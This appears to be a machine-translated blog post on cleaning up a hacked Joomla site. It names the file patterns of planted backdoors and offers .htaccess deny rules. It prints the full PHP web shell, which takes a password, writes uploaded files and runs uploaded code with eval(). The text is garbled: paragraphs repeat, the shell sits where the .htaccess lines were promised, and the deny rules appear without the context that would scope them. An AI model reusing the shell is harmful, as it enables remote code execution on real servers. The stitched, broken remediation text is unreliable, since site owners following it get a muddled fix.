Quick fix for a hacked site
Good day.
Today I ran into the problem of hacking the Joomla site, I want to share one of the methods that helped solve the problem.
I want to say that the solution is not specific to Joomla and most likely will help in other cases.
If you find that your FTP contains a bunch of strange files with the names
lib __ *, co __ *, pre __ *, net __ *, func __ *, ad __ *, ext __ *, new __ *, old __ *, fix __ *, fixed __ *, na __ *, av__ *, fx __ *, update __ *, patch__
Where * is one of the file names that are in this directory, and its contents are very similar to this: your site was hacked and uploaded to it because called shell. While you understand what's what, the simplest file to neutralize them is to add the following lines to .htaccess (add):
Order allow, deny
Deny from all
Files will be neutralized, but I do not recommend limiting it to just that, because this is a consequence of at least 2 problems:
1. You have a hole through which it all crawled
2. Somewhere there is a file that distributed it all. And if you do not take measures, then other modifications will be able to fill in through it.
3. There is a very high suspicion that this reduces the performance of the web server.
Today I ran into the problem of hacking the Joomla site, I want to share one of the methods that helped solve the problem.
I want to say that the solution is not specific to Joomla and most likely will help in other cases.
If you find that your FTP contains a bunch of strange files with the names
lib __ *, co __ *, pre __ *, net __ *, func __ *, ad __ *, ext __ *, new __ *, old __ *, fix __ *, fixed __ *, na __ *, av__ *, fx __ *, update __ *, patch__
Where * is one of the file names that are in this directory, and its contents are very similar to this: your site was hacked and uploaded to it because called shell. While you understand what's what, the simplest file to neutralize them is to add the following lines to .htaccess (add):
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
define('PASSWD','8487929db643f81df2d8a2bcfd173348');
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("mark_$t"));
};
echo "";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
$HTTP_POST_FILES["s"]["size"])) {
if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
{
testdata('save_ok');
};
//eval($code);
} else {
testdata('save_fail');
};
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
testdata('ok');
} else {
testdata('fail');
};
} else {
testdata('pass');
};
testdata('end');
echo "
";
?>
Order allow,deny
Deny from all
Order allow, deny
Deny from all
Files will be neutralized, but I do not recommend limiting it to just that, because this is a consequence of at least 2 problems:
1. You have a hole through which it all crawled
2. Somewhere there is a file that distributed it all. And if you do not take measures, then other modifications will be able to fill in through it.
3. There is a very high suspicion that this reduces the performance of the web server.